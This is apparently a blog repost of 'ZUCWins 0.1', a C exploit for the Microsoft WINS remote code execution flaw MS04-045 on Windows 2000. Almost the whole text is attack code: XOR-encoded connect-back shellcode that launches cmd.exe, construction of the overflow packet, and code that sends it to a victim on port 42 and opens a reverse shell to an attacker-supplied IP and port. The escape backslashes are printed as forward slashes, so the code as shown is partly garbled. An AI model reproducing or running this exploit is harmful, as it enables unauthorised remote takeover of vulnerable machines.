CSDN博客

img dcboy

Microsoft WINS Remote Code Execution Exploit (MS04-045)

发表于2005/1/1 12:34:00  834人阅读

Date : 31/12/2004
CAN-2004-1080

/*************************************************************/
/* ZUCWins 0.1 - Wins 2000 remote root exploit                                     */
/* Exploit by: zuc <zuc@hack.it>              		                         */ 
/* works on Windows 2000 SP3/SP4 probably every language                  */
/* Successfully tested by K-OTik Security on Win2k ENGLISH & FRENCH    */
/*************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <netinet/in.h>
#include <curses.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

	char shellcode[] =
"/xeb/x25/xe9/xfa/x99/xd3/x77/xf6/x02/x06/x6c/x59/x6c/x59/xf8"
"/x1d/x9c/xde/x8c/xd1/x4c/x70/xd4/x03/x58/x46/x57/x53/x32/x5f"
"/x33/x32/x2e/x44/x4c/x4c/x01/xeb/x05/xe8/xf9/xff/xff/xff/x5d"
"/x83/xed/x2c/x6a/x30/x59/x64/x8b/x01/x8b/x40/x0c/x8b/x70/x1c"
"/xad/x8b/x78/x08/x8d/x5f/x3c/x8b/x1b/x01/xfb/x8b/x5b/x78/x01"
"/xfb/x8b/x4b/x1c/x01/xf9/x8b/x53/x24/x01/xfa/x53/x51/x52/x8b"
"/x5b/x20/x01/xfb/x31/xc9/x41/x31/xc0/x99/x8b/x34/x8b/x01/xfe"
"/xac/x31/xc2/xd1/xe2/x84/xc0/x75/xf7/x0f/xb6/x45/x09/x8d/x44"
"/x45/x08/x66/x39/x10/x75/xe1/x66/x31/x10/x5a/x58/x5e/x56/x50"
"/x52/x2b/x4e/x10/x41/x0f/xb7/x0c/x4a/x8b/x04/x88/x01/xf8/x0f"
"/xb6/x4d/x09/x89/x44/x8d/xd8/xfe/x4d/x09/x75/xbe/xfe/x4d/x08"
"/x74/x17/xfe/x4d/x24/x8d/x5d/x1a/x53/xff/xd0/x89/xc7/x6a/x02"
"/x58/x88/x45/x09/x80/x45/x79/x0c/xeb/x82/x50/x8b/x45/x04/x35"
"/x93/x93/x93/x93/x89/x45/x04/x66/x8b/x45/x02/x66/x35/x93/x93"
"/x66/x89/x45/x02/x58/x89/xce/x31/xdb/x53/x53/x53/x53/x56/x46"
"/x56/xff/xd0/x89/xc7/x55/x58/x66/x89/x30/x6a/x10/x55/x57/xff"
"/x55/xe0/x8d/x45/x88/x50/xff/x55/xe8/x55/x55/xff/x55/xec/x8d"
"/x44/x05/x0c/x94/x53/x68/x2e/x65/x78/x65/x68/x5c/x63/x6d/x64"
"/x94/x31/xd2/x8d/x45/xcc/x94/x57/x57/x57/x53/x53/xfe/xca/x01"
"/xf2/x52/x94/x8d/x45/x78/x50/x8d/x45/x88/x50/xb1/x08/x53/x53"
"/x6a/x10/xfe/xce/x52/x53/x53/x53/x55/xff/x55/xf0/x6a/xff/xff"
"/x55/xe4";

char mess[] =
"/x00/x03/x0d/x4c/x77/x77/xFF/x77/x05/x4e/x00/x3c/x01/x02/x03/x04"
//  "/x00/x03/x0d/x4c/x77/x77/xFF/x77/x05/x4e/x00/x3c/x01/x02/x03/x04"
	
"/x6c/xf4/x3d/x05/x00/x02/x4e/x05/x00/x02/x4e/x05/x00/x02/x4e/x05/x00/x02/
x4e/x05/x00/x02/x4e/x05/x00/x02/x4e/x05/x00/x02/x4e/x05/x00/x02/x4e/x05";
char rep[] =
	
"/x90/x01/x4e/x05/x90/x00/x4e/x05/x90/x00/x4e/x05/x90/x00/x4e/x05/x90/x00/
x4e/x05/x90/x00/x4e/x05/x90/x00/x4e/x05/x90/x03/x4e/x05/x90/x00/x4e/x05";
void usage();

int main(int argc, char *argv[])
{ 
int i,sock,sock2,sock3,addr,len=16;
int rc;
  unsigned long XORIP = 0x93939393;
  unsigned short XORPORT = 0x9393;
int cbport;
long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

if(argc<4 || argc>4)
usage();

cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
for(ir =0;ir<200000;ir++)mess2[ir]='/x90';
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
	memcpy(mess3+le,rep,sizeof(rep)-1);
	le+=sizeof(rep)-1;
}
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode));
int lenr=le+200000+sizeof(shellcode);
hp = gethostbyname(argv[1]);

addr = inet_addr(argv[1]);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{ 
//printf("socket() error.../n");
exit(-1);
}

mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(42);

printf("[*] connecting the target/n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct 
sockaddr_in));
printf("[*] sending exploit/n");
send(sock,mess3,lenr,0);
printf("[*] exploit sent/n");
sleep(5);
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}

void usage()
{
unsigned int a;
printf("/nUsage: <victim-host> <connectback-ip> <connectback port>/n");
printf("Sample: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337/n/n");
exit(0);
}
0 0

相关博文

我的热门文章

img
取 消
img